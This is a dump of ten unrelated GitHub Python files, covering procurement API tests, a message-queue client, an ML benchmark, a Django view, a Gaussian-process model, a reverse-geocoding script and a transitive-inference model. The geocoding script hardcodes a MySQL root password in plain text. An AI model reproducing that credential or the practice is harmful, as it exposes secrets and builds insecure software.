+{"seq_id":"34581262567","text":"# -*- coding: utf-8 -*-\nimport unittest\n\nfrom openprocurement.api.tests.base import snitch\n\nfrom openprocurement.tender.belowthreshold.tests.base import test_lots\nfrom openprocurement.tender.belowthreshold.tests.lot import (\n TenderLotResourceTestMixin,\n TenderLotFeatureResourceTestMixin,\n TenderLotProcessTestMixin,\n)\nfrom openprocurement.tender.belowthreshold.tests.lot_blanks import tender_lot_milestones\n\nfrom openprocurement.tender.openua.tests.base import test_bids\nfrom openprocurement.tender.openua.tests.lot import TenderUALotResourceTestMixin, TenderUALotProcessTestMixin\nfrom openprocurement.tender.openua.tests.lot_blanks import (\n # TenderLotFeatureResourceTest\n create_tender_bidder_invalid,\n patch_tender_bidder,\n # TenderLotFeatureBidderResourceTest\n create_tender_bidder_feature_invalid,\n create_tender_bidder_feature,\n)\n\nfrom openprocurement.tender.openuadefense.tests.base import BaseTenderUAContentWebTest, test_tender_data\nfrom openprocurement.tender.openuadefense.tests.lot_blanks import (\n # TenderLotEdgeCasesTest\n question_blocking,\n claim_blocking,\n next_check_value_with_unanswered_question,\n next_check_value_with_unanswered_claim,\n # TenderLotProcessTest\n one_lot_1bid,\n two_lot_1bid_0com_1can,\n two_lot_1bid_0com_0win,\n two_lot_1bid_1com_1win,\n two_lot_1bid_2com_1win,\n two_lot_2bid_on_first_and_1_on_second_awarding,\n)\n\n\nclass TenderLotResourceTest(BaseTenderUAContentWebTest, TenderLotResourceTestMixin, TenderUALotResourceTestMixin):\n test_lots_data = test_lots\n test_tender_lot_milestones = snitch(tender_lot_milestones)\n\n\nclass TenderLotEdgeCasesTest(BaseTenderUAContentWebTest):\n initial_lots = test_lots * 2\n initial_bids = test_bids\n\n test_question_blocking = snitch(question_blocking)\n test_claim_blocking = snitch(claim_blocking)\n test_next_check_value_with_unanswered_question = snitch(next_check_value_with_unanswered_question)\n test_next_check_value_with_unanswered_claim = snitch(next_check_value_with_unanswered_claim)\n\n\nclass TenderLotFeatureResourceTest(BaseTenderUAContentWebTest, TenderLotFeatureResourceTestMixin):\n initial_data = test_tender_data\n initial_lots = 2 * test_lots\n invalid_feature_value = 0.5\n max_feature_value = 0.3\n sum_of_max_value_of_all_features = 0.3\n\n\nclass TenderLotBidderResourceTest(BaseTenderUAContentWebTest):\n # initial_status = 'active.tendering'\n initial_lots = test_lots\n\n test_create_tender_bidder_invalid = snitch(create_tender_bidder_invalid)\n test_patch_tender_bidder = snitch(patch_tender_bidder)\n\n\nclass TenderLotFeatureBidderResourceTest(BaseTenderUAContentWebTest):\n initial_lots = test_lots\n\n def setUp(self):\n super(TenderLotFeatureBidderResourceTest, self).setUp()\n self.lot_id = self.initial_lots[0][\"id\"]\n response = self.app.patch_json(\n \"/tenders/{}?acc_token={}\".format(self.tender_id, self.tender_token),\n {\n \"data\": {\n \"items\": [{\"relatedLot\": self.lot_id, \"id\": \"1\"}],\n \"features\": [\n {\n \"code\": \"code_item\",\n \"featureOf\": \"item\",\n \"relatedItem\": \"1\",\n \"title\": u\"item feature\",\n \"enum\": [{\"value\": 0.01, \"title\": u\"good\"}, {\"value\": 0.02, \"title\": u\"best\"}],\n },\n {\n \"code\": \"code_lot\",\n \"featureOf\": \"lot\",\n \"relatedItem\": self.lot_id,\n \"title\": u\"lot feature\",\n \"enum\": [{\"value\": 0.01, \"title\": u\"good\"}, {\"value\": 0.02, \"title\": u\"best\"}],\n },\n {\n \"code\": \"code_tenderer\",\n \"featureOf\": \"tenderer\",\n \"title\": u\"tenderer 
feature\",\n \"enum\": [{\"value\": 0.01, \"title\": u\"good\"}, {\"value\": 0.02, \"title\": u\"best\"}],\n },\n ],\n }\n },\n )\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(response.content_type, \"application/json\")\n self.assertEqual(response.json[\"data\"][\"items\"][0][\"relatedLot\"], self.lot_id)\n\n test_create_tender_bidder_invalid = snitch(create_tender_bidder_feature_invalid)\n test_create_tender_bidder = snitch(create_tender_bidder_feature)\n\n\nclass TenderLotProcessTest(BaseTenderUAContentWebTest, TenderLotProcessTestMixin, TenderUALotProcessTestMixin):\n setUp = BaseTenderUAContentWebTest.setUp\n initial_data = test_tender_data\n\n days_till_auction_starts = 6\n\n test_lots_data = test_lots # TODO: change attribute identifier\n test_1lot_1bid = snitch(one_lot_1bid)\n test_2lot_1bid_0com_1can = snitch(two_lot_1bid_0com_1can)\n test_2lot_1bid_2com_1win = snitch(two_lot_1bid_2com_1win)\n test_2lot_1bid_0com_0win = snitch(two_lot_1bid_0com_0win)\n test_2lot_1bid_1com_1win = snitch(two_lot_1bid_1com_1win)\n test_2lot_2bid_on_first_and_1_on_second_awarding = snitch(two_lot_2bid_on_first_and_1_on_second_awarding)\n\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TenderLotResourceTest))\n suite.addTest(unittest.makeSuite(TenderLotBidderResourceTest))\n suite.addTest(unittest.makeSuite(TenderLotFeatureBidderResourceTest))\n suite.addTest(unittest.makeSuite(TenderLotProcessTest))\n return suite\n\n\nif __name__ == \"__main__\":\n unittest.main(defaultTest=\"suite\")\n","repo_name":"openprocurement/ProzorroUKR-openprocurement.api","sub_path":"src/openprocurement/tender/openuadefense/tests/lot.py","file_name":"lot.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"}
+{"seq_id":"29139107425","text":"# This file is part of eventmq.\n#\n# eventmq is free software: you can redistribute it and/or modify it under the\n# terms of the GNU Lesser General Public License as published by the Free\n# Software Foundation, either version 2.1 of the License, or (at your option)\n# any later version.\n#\n# eventmq is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with eventmq. If not, see .\n\"\"\"\n:mod:`messages` -- Client Messaging\n===================================\n\"\"\"\nfrom json import dumps as serialize\nimport logging\n\nfrom past.builtins import basestring\n\nfrom .. import conf\nfrom ..utils.functions import name_from_callable, split_callable_name\nfrom ..utils.messages import send_emqp_message\n\nlogger = logging.getLogger(__name__)\n\n\ndef schedule(socket, func, interval_secs=None, args=(), kwargs=None,\n class_args=(), class_kwargs=None, headers=('guarantee',),\n queue=conf.DEFAULT_QUEUE_NAME, unschedule=False, cron=None):\n \"\"\"\n Execute a task on a defined interval.\n\n .. note::\n\n All passed class & fuction kwargs/args MUST be json serializable.\n\n Args:\n socket (socket): eventmq socket to use for sending the message\n func (callable): the callable (or string path to calable) to be\n scheduled on a worker\n interval_secs (int): Run job every interval_secs or None if using cron\n args (list): list of *args to pass to the callable\n cron (string): cron formatted string used for job schedule if\n interval_secs is None, i.e. '* * * * *' (every minute)\n kwargs (dict): dict of **kwargs to pass to the callable\n class_args (list): list of *args to pass to the class (if applicable)\n class_kwargs (dict): dict of **kwargs to pass to the class (if\n applicable)\n headers (list): list of strings denoting enabled headers. Default:\n guarantee is enabled to ensure the scheduler schedules the job.\n queue (str): name of the queue to use when executing the job. The\n default value is the default queue.\n Raises:\n TypeError: When one or more parameters are not JSON serializable.\n Returns:\n str: ID of the schedule message that was sent. None if there was an\n error\n \"\"\"\n if not class_kwargs:\n class_kwargs = {}\n if not kwargs:\n kwargs = {}\n\n if not unschedule and \\\n ((interval_secs and cron) or (not interval_secs and not cron)):\n logger.error('You must sepcify either `interval_secs` or `cron`, '\n 'but not both (or neither)')\n return\n\n if func and isinstance(func, basestring):\n if '.' 
not in func:\n logger.error('Invalid callable string passed, '\n 'absolute path required: \"{}\"'.format(func))\n return\n path, callable_name = split_callable_name(func)\n elif callable(func):\n callable_name = name_from_callable(func)\n path, callable_name = split_callable_name(callable_name)\n else:\n logger.error('Encountered non-callable func: {}'.format(func))\n return\n\n if not callable_name or not path:\n logger.error('Encountered invalid callable, will not proceed.')\n return\n\n # TODO: convert all the times to seconds for the clock\n msg = ['run', {\n 'callable': callable_name,\n 'path': path,\n 'args': args,\n 'kwargs': kwargs,\n 'class_args': class_args,\n 'class_kwargs': class_kwargs,\n }]\n\n msgid = send_schedule_request(socket, interval_secs=interval_secs or -1,\n cron=cron or '',\n message=msg, headers=headers, queue=queue,\n unschedule=unschedule)\n\n # TODO: Return msgid only if we got some sort of ACK\n return msgid\n\n\ndef defer_job(\n socket, func, args=(), kwargs=None, class_args=(),\n class_kwargs=None, reply_requested=False, guarantee=False,\n retry_count=0, timeout=0, debounce_secs=False,\n queue=conf.DEFAULT_QUEUE_NAME):\n \"\"\"\n Used to send a job to a worker to execute via `socket`.\n\n This tries not to raise any exceptions so use some of the message flags to\n guarantee things.\n\n .. note::\n\n All passed class & function kwargs/args MUST be json serializable.\n\n Args:\n socket (socket): eventmq socket to use for sending the message\n func (callable or str): the callable (or string path to callable) to be\n deferred to a worker\n args (list): list of *args for the callable\n kwargs (dict): dict of **kwargs for the callable\n class_args (list): list of *args to pass to the class when\n initializing (if applicable).\n class_kwargs (dict): dict of **kwargs to pass to the class when\n initializing (if applicable).\n reply_requested (bool): request the return value of func as a reply\n retry_count (int): How many times the job should be retried when\n encountering an Exception or some other failure before giving up.\n (default: 0 or immediately fail)\n timeout (int): How many seconds should we wait before killing the job\n default: 0 which means infinite timeout\n debounce_secs (secs): Number of seconds to debounce the job. See\n `debounce_deferred_job` for more information.\n queue (str): Name of queue to use when executing the job. If this value\n evaluates to False, the default is used. Default: the configured\n default queue name\n Raises:\n TypeError: When one or more parameters are not JSON serializable.\n Returns:\n str: ID for the message/deferred job. This value will be None if there\n was an error.\n \"\"\"\n callable_name = None\n path = None\n\n # Just in case this was passed None\n if not queue:\n queue = conf.DEFAULT_QUEUE_NAME\n\n if not class_kwargs:\n class_kwargs = {}\n\n if not kwargs:\n kwargs = {}\n\n if func and isinstance(func, basestring):\n if '.' 
not in func:\n logger.error('Invalid callable string passed, '\n 'absolute path required: \"{}\"'.format(func))\n return\n path, callable_name = split_callable_name(func)\n elif callable(func):\n callable_name = name_from_callable(func)\n path, callable_name = split_callable_name(callable_name)\n else:\n logger.error('Encountered non-callable func: {}'.format(func))\n return\n\n if not callable_name or not path:\n logger.error('Encountered invalid callable, will not proceed.')\n return\n\n msg = ['run', {\n 'callable': callable_name,\n 'path': path,\n 'args': args,\n 'kwargs': kwargs,\n 'class_args': class_args,\n 'class_kwargs': class_kwargs,\n }]\n\n msgid = send_request(socket, msg,\n reply_requested=reply_requested,\n guarantee=guarantee,\n retry_count=retry_count,\n timeout=timeout,\n queue=queue)\n\n return msgid\n\n\ndef send_request(socket, message, reply_requested=False, guarantee=False,\n retry_count=0, timeout=0, queue=None):\n \"\"\"\n Send a REQUEST command.\n\n All optional headers are disabled by default; a header is enabled by\n including it in the headers sent with the message.\n\n To execute a task, the message should be formatted as follows:\n {subcommand(str), {\n # dot path location where callable can be imported. If callable is a\n # method on a class, the class should always come last, and be\n # separated with a colon. (So we know to instantiate on the receiving\n # end)\n 'path': path(str),\n # function or method name to run\n 'callable': callable(str),\n # Optional args for callable\n 'args': (arg, arg),\n # Optional kwargs for callable\n 'kwargs': {'kwarg': kwarg},\n # Optional class args, kwargs\n 'class_args': (arg2, arg3),\n 'class_kwargs': {'kwarg2': kwarg}\n\n }\n }\n Args:\n socket: Socket (Sender or Receiver) to use when sending `message`\n message: message to send to `socket`\n reply_requested (bool): request the return value of func as a reply\n guarantee (bool): make a best effort to guarantee that func is\n executed. Exceptions and failures will be logged.\n retry_count (int): How many times the job should be retried when\n encountering an Exception or some other failure before giving up.\n (default: 0 or immediately fail)\n timeout (int): How many seconds should we wait before killing the job\n default: 0 which means infinite timeout\n queue (str): Name of queue to use when executing the job. 
Default: the\n configured default queue name\n\n Returns:\n str: ID of the message\n \"\"\"\n headers = []\n\n if reply_requested:\n headers.append('reply-requested')\n\n if guarantee:\n headers.append('guarantee')\n\n if retry_count > 0:\n headers.append('retry-count:%d' % retry_count)\n\n if timeout > 0:\n headers.append('timeout:%d' % timeout)\n\n msgid = send_emqp_message(socket, 'REQUEST',\n (queue or conf.DEFAULT_QUEUE_NAME,\n \",\".join(headers),\n serialize(message)))\n\n return msgid\n\n\ndef send_schedule_request(socket, message, interval_secs=-1, headers=(),\n queue=None, unschedule=False, cron=''):\n \"\"\"\n Send a SCHEDULE or UNSCHEDULE command.\n\n Queues a message requesting that something happens on an\n interval for the scheduler.\n\n Args:\n socket (socket): eventmq socket to use for sending the message\n message: Message to send socket.\n interval_secs (int): run the job every interval_secs seconds, or -1\n when the schedule is given via `cron`\n headers (list): List of headers for the message\n queue (str): name of queue the job should be executed in\n unschedule (bool): when True, send an UNSCHEDULE command instead\n cron (str): cron formatted schedule string, used when interval_secs\n is -1\n Returns:\n str: ID of the message\n \"\"\"\n\n if unschedule:\n command = 'UNSCHEDULE'\n else:\n command = 'SCHEDULE'\n\n msgid = send_emqp_message(socket, command,\n (queue or conf.DEFAULT_QUEUE_NAME,\n ','.join(headers),\n str(interval_secs),\n serialize(message),\n cron))\n\n return msgid\n\n\ndef send_publish_request(socket, topic, message):\n\n msgid = send_emqp_message(socket, 'PUBLISH',\n (topic,\n serialize(message), ))\n\n return msgid\n","repo_name":"eventmq/eventmq","sub_path":"eventmq/client/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":10986,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
+{"seq_id":"73444402863","text":"#!/usr/bin/env python3\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\n\nimport random\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns; sns.set()\n\nimport time\n\nimport numpy as np\ndef trainAndTest(train, test, train_labels, test_labels, label_names, labels, feature_names, features, run_number):\n incorrect_preds = {}\n bad_preds_file = open(\"BadPredictionsOut.txt\", \"a\")\n \n gnb = GaussianNB()\n\n model = gnb.fit(train, train_labels)\n preds = gnb.predict(test)\n for i in range(len(preds)):\n if preds[i] != test_labels[i]:\n incorrect_preds[i] = \"Tumor Number \" + str(i) + \" was predicted to be \" + str(label_names[preds[i]]).upper() + \" but was actaully \" + str(label_names[test_labels[i]]).upper() + \"\\n\"\n bad_preds_file.write(\"{:*^20}\\n\".format(\"Run {}\".format(run_number)))\n bad_preds_file.write(\"Number of Incorrect Preditions {}\\n\".format(len(incorrect_preds)))\n if len(incorrect_preds) > 0:\n for key in incorrect_preds:\n bad_preds_file.write(incorrect_preds[key])\n bad_preds_file.write(\"{:*^20}\\n\\n\".format(\"END RUN {}\".format(run_number)))\n mat = confusion_matrix(preds, test_labels)\n return accuracy_score(test_labels, preds), mat, label_names, len(incorrect_preds)\n\ndef main():\n mean_accuracy = 0\n mat = np.empty(shape=(2, 2)).tolist()\n names = []\n summary_file = open(\"BenchmarkOutputSummary.txt\", \"w\")\n\n #load data\n data = load_breast_cancer()\n\n\n #organize data\n label_names = data['target_names']\n labels = data['target']\n feature_names = data['feature_names']\n features = data['data']\n max_fuckups = 0\n min_fuckups = 1000000000\n summary_list = []\n max_accuracy = 0\n min_accuracy = 10000000\n\n #print(feature_names)\n print(\"Number of tumors {:>7}\".format(569))\n print(\"Number of Features {:>6}\".format(len(feature_names)))\n print(\"Total Data Points {:>7}\".format(569*len(feature_names)))\n print(\"Total Predictions {:>7}\".format(\"~180000\"))\n confusion_matrix = [0]\n graph_names = []\n for i in range(1, 1000):\n # Split our data\n train, test, train_labels, test_labels = train_test_split(features, labels, test_size=0.33, random_state=random.randint(1,1000))\n\n #print(\"{:*^20}\".format(\"Run # {}:\".format(i)))\n run_accuracy, tmp_mat, names, num_incorrect_preds = trainAndTest(train, test, train_labels, test_labels, label_names, labels, feature_names, features, i)\n mean_accuracy += run_accuracy\n if num_incorrect_preds > max_fuckups:\n max_fuckups = num_incorrect_preds\n min_accuracy = run_accuracy\n if num_incorrect_preds < min_fuckups:\n min_fuckups = num_incorrect_preds\n max_accuracy = run_accuracy\n if len(confusion_matrix) == 1:\n confusion_matrix = tmp_mat\n else:\n confusion_matrix = confusion_matrix + tmp_mat\n #print(\"{:*^20}\".format(\"Run Accuracy: {}\".format(run_accuracy)))\n summary_list.append(\"Run {0:<10} Accuracy: {1:<15}\\t{2:>15} wrong predictions\\n\".format(i, run_accuracy, num_incorrect_preds))\n mean_accuracy = mean_accuracy/1000\n print(\"\\nTotal Mean Accuracy for 1000 runs: {}\\n\".format(mean_accuracy))\n print(\"Highest Number of wrong predictions: {0:<10} Accuracy: {1:<10}\\nLowest Number of wrong predictions: {2:<11} Accuracy: {3:<10}\".format(max_fuckups, min_accuracy, min_fuckups, max_accuracy))\n summary_file.write(\"{:*^30}\\n\".format(\" SUMMARY \"))\n 
summary_file.write(\"Total Mean Accuracy for 1000 runs: {}\\n\".format(mean_accuracy))\n summary_file.write(\"Highest Number of wrong predictions: {0}\\n Lowest Number of wrong predictions: {1}\\n\".format(max_fuckups, min_fuckups))\n summary_file.write(\"{:*^30}\\n\\n\".format(\" END SUMMARY \"))\n summary_file.write(\"{:*^30}\\n\".format(\" INDIVIDUAL RUN DATA \"))\n for summary in summary_list:\n summary_file.write(summary)\n sns.heatmap(confusion_matrix, square=True, annot=True, fmt='d', cbar=False, xticklabels=names, yticklabels=names)\n\n plt.ylabel('Predicted')\n plt.xlabel('Actual')\n plt.savefig(\"BenchmarkHeatMap.png\")\n plt.show()\n\nmain()\n","repo_name":"KevinGConyers/COMP5130-Project-Code","sub_path":"Benchmark.py","file_name":"Benchmark.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"16357472895","text":"def subset(B, k, n, A, soma, r):\n\tif soma == r:\n\t\treturn 1\n\telse:\n\t\tif k+1 < n:\n\t\t\tB[k] = True\t\t\n\t\t\tr1 = subset(B, k+1, n, A, soma + A[k], r)\n\t\t\tB[k]= False\n\t\t\tr2 = subset(B, k+1, n, A, soma, r)\n\t\t\treturn r1 or r2\t\n\t\telse:\n\t\t\treturn 0\n\nwhile True:\n\ttry:\n\t\tentry = input().split(' ')\n\t\tR = int(entry[0])\n\t\tK = int(entry[1])\n\n\t\tB = []\n\t\tA = []\n\t\tfor i in range(R):\n\t\t\tB.append(False)\n\t\t\tA.append(0)\n\n\t\tfor i in range(K):\n\t\t\tentry = input().split(' ')\n\t\t\tA[int(entry[0]) - 1] += 1\n\t\t\tA[int(entry[1]) - 1] += 1\n\t\t#print('A:', A)\n\n\t\tif subset(B, 0, R, A, 0, K):\n\t\t\tprint('S')\n\t\telse:\n\t\t\tprint('N')\n\texcept EOFError:\n\t\tbreak\n","repo_name":"GabrielEstevam/icpc_contest_training","sub_path":"uri/uri_python/paradigmas/p1203_2.py","file_name":"p1203_2.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"24891080784","text":"#Extracting Data from JSON\n\nimport urllib.parse, urllib.error, urllib.request\nimport json\n\nurl = input('Enter location: ')\n\ntry:\n handle = urllib.request.urlopen(url)\nexcept:\n print('Invalid URL.')\n quit()\n\nprint('Retrieving', url)\n\ndata = handle.read().decode()\n\nprint('Retrieved', len(data), 'characters')\n\njs = json.loads(data)\n\nprint('Count:', len(js['comments']))\n\ns = 0\n\nfor comm in js['comments']:\n s += int(comm['count'])\n\nprint('Sum', s)\n","repo_name":"andrei-micuda/py4e","sub_path":"13.Web/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"28276093389","text":"from django.shortcuts import render, HttpResponse\nfrom home.models import Contact\nfrom django.contrib import messages\n# Create your views here.\n\ndef index(request):\n context ={\n \"variable\": \"This is variable\"\n }\n return render(request,'index.html',context)\n \ndef about(request):\n if request.method == 'POST':\n name = request.POST.get('name1')\n email = request.POST.get('email1')\n desc = request.POST.get('feedback')\n contact = Contact(name=name, email=email, desc= desc)\n contact.save()\n messages.success(request, 'Your response has been submitted')\n return render(request,'about.html')\n","repo_name":"purohit-arun/Django-Site","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"32382486155","text":"from __future__ import absolute_import\nimport tensorflow as tf\nimport numpy as np\n\nimport _settings\nimport transforms\nimport conditionals\nimport kullback_leiblers\nfrom mean_functions import Zero\nfrom models import GPModel\n\n\nclass SVGP(GPModel):\n \"\"\"\n This is the Sparse Variational GP (SVGP). The key reference is\n\n ::\n\n @inproceedings{hensman2014scalable,\n title={Scalable Variational Gaussian Process Classification},\n author={Hensman, James and Matthews,\n Alexander G. de G. and Ghahramani, Zoubin},\n booktitle={Proceedings of AISTATS},\n year={2015}\n }\n\n \"\"\"\n def __init__(self, X, Y, kern, likelihood, Z,\n mean_function=None,\n num_latent=None,\n q_diag=False,\n whiten=True,\n minibatch_size=None,\n **kwargs):\n \"\"\"\n - X is a data matrix, size N x D\n - Y is a data matrix, size N x R\n - kern, likelihood, mean_function are appropriate GPflow objects\n - Z is a matrix of pseudo inputs, size M x D\n - num_latent is the number of latent process to use, default to\n Y.shape[1]\n - q_diag is a boolean. If True, the covariance is approximated by a\n diagonal matrix.\n - whiten is a boolean. If True, we use the whitened representation of\n the inducing points.\n \"\"\"\n # sort out the X, Y into MiniBatch objects if required.\n GPModel.__init__(self, X, Y, kern, likelihood, mean_function, **kwargs)\n \n # init the super class, accept args\n self.num_data = int(X.shape[0])\n self.q_diag, self.whiten = q_diag, whiten\n self.Z = tf.Variable(Z, dtype=_settings.tf_float)\n self.num_latent = num_latent or int(Y.shape[1])\n self.num_inducing = Z.shape[0]\n\n # init variational parameters\n self.q_mu = tf.Variable(np.zeros((self.num_inducing, self.num_latent)), dtype=_settings.tf_float)\n if self.q_diag:\n self.q_sqrt_temp = tf.Variable(np.ones((self.num_inducing, self.num_latent)), dtype=_settings.tf_float)\n self.q_sqrt = tf.square(self.q_sqrt_temp)\n else:\n self.q_sqrt_temp = np.array([np.eye(self.num_inducing)\n for _ in range(self.num_latent)]).swapaxes(0, 2)\n# self.q_sqrt_temp = transforms.LowerTriangular(self.num_inducing, self.num_latent).backward(self.q_sqrt_temp)\n# self.q_sqrt = tf.Variable(tf.contrib.linalg.LinearOperatorTriL(q_sqrt).to_dense())\n self.q_sqrt = tf.Variable(self.q_sqrt_temp, dtype=_settings.tf_float)\n\n def build_prior_KL(self):\n if self.whiten:\n if self.q_diag:\n KL = kullback_leiblers.gauss_kl_white_diag(self.q_mu, self.q_sqrt)\n else:\n KL = kullback_leiblers.gauss_kl_white(self.q_mu, self.q_sqrt)\n else:\n K = self.kern.K(self.Z) + tf.eye(self.num_inducing, dtype=_settings.tf_float) * _settings.jitter_level\n if self.q_diag:\n KL = kullback_leiblers.gauss_kl_diag(self.q_mu, self.q_sqrt, K)\n else:\n KL = kullback_leiblers.gauss_kl(self.q_mu, self.q_sqrt, K)\n return KL\n\n def _build_likelihood(self):\n \"\"\"\n This gives a variational bound on the model likelihood.\n \"\"\"\n\n # Get prior KL.\n KL = self.build_prior_KL()\n\n # Get conditionals\n fmean, fvar = self._build_predict(self.X, full_cov=False)\n\n # Get variational expectations.\n var_exp = self.likelihood.variational_expectations(fmean, fvar, self.Y)\n\n # re-scale for minibatch size\n scale = tf.cast(self.num_data, _settings.tf_float) / tf.cast(tf.shape(self.X)[0], _settings.tf_float)\n\n return tf.reduce_sum(var_exp) * scale - KL\n\n def _build_predict(self, Xnew, full_cov=False):\n mu, var = conditionals.conditional(Xnew, self.Z, self.kern, self.q_mu,\n q_sqrt=self.q_sqrt, full_cov=full_cov, whiten=self.whiten)\n return mu + 
self.mean_function(Xnew), var\n","repo_name":"AlexLewandowski/flw","sub_path":"flw/models/svgp.py","file_name":"svgp.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"36316866627","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 2 17:55:38 2020\n\n@author: jha\n\n\"\"\"\n\n#%%\nimport csv\nimport mysql.connector as mariadb\nfrom tabulate import tabulate\nimport pandas as pd\n\namrdb= mariadb.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"Sukhoi@90\",\n database =\"myamr\"\n )\ncursor = amrdb.cursor(buffered=True) # else it fetches one row for everytime it is executed \nprint(\"We are at line 31 we have connection, lets begin\")\n\n#%%\n\n\n#get the data from the ast table to make the dataframe \n#%%\nimport pandas as pd\nnumrows= cursor.execute(\"SELECT `Lat/Lon` FROM EcoliIBisodatlocmerge group by `Lat/Lon` limit 10\")\nprint(\"Selected %s rows\" %numrows)\nprint(\"Selected %s rows \" %cursor.rowcount)\nrows =cursor.fetchall()#fetch all rows at once\n#print(tabulate(rows, headers=['AST_phenotype'], tablefmt='psql'))\ndf = pd.DataFrame(rows)\ndf.columns=[\"LL\"]\n#%%\n\n\n#%%\n\nfrom geopy.geocoders import Nominatim \ngeolocator = Nominatim(user_agent=\"geoapiExercises\") \ndef city_state_country(coord): \n location = geolocator.reverse(coord, exactly_one=True) \n address = location.raw['address']\n state = address.get('state', '') \n return state \nlist_ll=df[\"LL\"].to_list()\nlist_l = ['0' if x is None else x for x in list_ll]\nfor i in list_l: \n try:\n l=city_state_country(i)\n print(l,i)\n \n \n except:\n print(\"missing values\")\n continue\n\n\n\n#%%","repo_name":"venomj26/AMR","sub_path":"reversegeomapping.py","file_name":"reversegeomapping.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"13944123179","text":"# CODE FOR SERIAL COMMUNICATION BETWEEN RASPBERRY AND ARDUINO UNO\nimport serial,time\n\nser = serial.Serial(port='COM1', baudrate=9600, timeout=10) # specify serial port and bauderate\nprint(ser.name) # check which port is really used\n\nwhile 1:\n line = str(ser.read(3))\n #print(line)\n i = line.find(\"0\")\n if i<0:\n i = line.find(\"1\")\n if i>=0:\n num = int(line[i:i+1])\n print(num)\n #time.sleep(1) # sleep 1 seconds\n\nser.close() ##Only executes once the loop exits","repo_name":"AmI-2018/YSDI-code","sub_path":"MultiThreading/Arduino_Raspberry/Serial_connection/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"39000297566","text":"\"\"\" Transitive-Inference model implementation.\n\"\"\"\nimport ccobra\nimport random\nimport math\nfrom modelfunctions import * \n\nclass BushMosteller(ccobra.CCobraModel):\n \"\"\" News reasoning CCOBRA implementation.\n \"\"\"\n\n def __init__(self, name='Bush-Mosteller-Wynne95'):\n \"\"\" Initializes the news reasoning model.\n Parameters\n ----------\n name : str\n Unique name of the model. Will be used throughout the ORCA\n framework as a means for identifying the model.\n \"\"\"\n self.Db = 0.125 #rate parameter for the effect of nonreward.\n self.V = {} #ranks\n self.vInit = 0.001\n self.lastChosen = None\n super().__init__(name, ['spatial-relational'], ['single-choice'])\n\n def predict(self, item, **kwargs):\n left, right = int(item.choices[0][0][0]), int(item.choices[1][0][0])\n X, Y = left, right\n r = self.v(X)/max(self.v(X) + self.v(Y), 0.00001)\n if r >= 0.5:\n if random.random() < 0.5 + 0.883*pow(2*r-1,0.75):\n chosen = int(left)\n else:\n chosen= int(right)\n else:\n if random.random() < 0.5 - 0.883*pow(1-2*r,0.75):\n chosen = int(left)\n else:\n chosen = int(right)\n return chosen\n\n def predictS(self, itemPair):\n left, right = int(itemPair[0]), int(itemPair[1])\n X, Y = left, right\n r = float(self.v(X))/max(self.v(X) + self.v(Y),0.00001)# if (self.v(X) + self.v(Y)) > self.v(X) else int(self.v(X)!=0)\n if r >= 0.5:\n return 0.5 + 0.883*pow(2*r-1,0.75)\n return 0.5 - 0.883*pow(1-2*r,0.75)\n def adaptS(self, itemPair):\n left, right = int(itemPair[0]), int(itemPair[1])\n if correctReply((left, right)) == str(left):\n self.V[left] = self.Db*(1-self.v(left)) + self.v(left)\n self.V[right] = (-1)*self.Db*self.v(right) + self.v(right)\n elif correctReply((left, right)) == str(right):\n self.V[left] = (-1)*self.Db*self.v(left) + self.v(left)\n self.V[right] = self.Db*(1-self.v(right)) + self.v(right)\n else:\n print('error')\n def adapt(self, item, target, **kwargs):\n left, right = int(item.choices[0][0][0]), int(item.choices[1][0][0])\n if correctReply((left, right)) == str(left):\n self.V[left] = self.Db*(1-self.v(left)) + self.v(left)\n self.V[right] = (-1)*self.Db*self.v(right) + self.v(right)\n elif correctReply((left, right)) == str(right):\n self.V[left] = (-1)*self.Db*self.v(left) + self.v(left)\n self.V[right] = self.Db*(1-self.v(right)) + self.v(right)\n else:\n print('error')\n \n def v(self, item):\n if item not in self.V.keys():\n self.V[item] = self.vInit\n return self.V[item]\n \n","repo_name":"CognitiveComputationLab/cogmods","sub_path":"relational/student_projects/2020_borukhson/models/TransitiveInference/BushMosteller.py","file_name":"BushMosteller.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
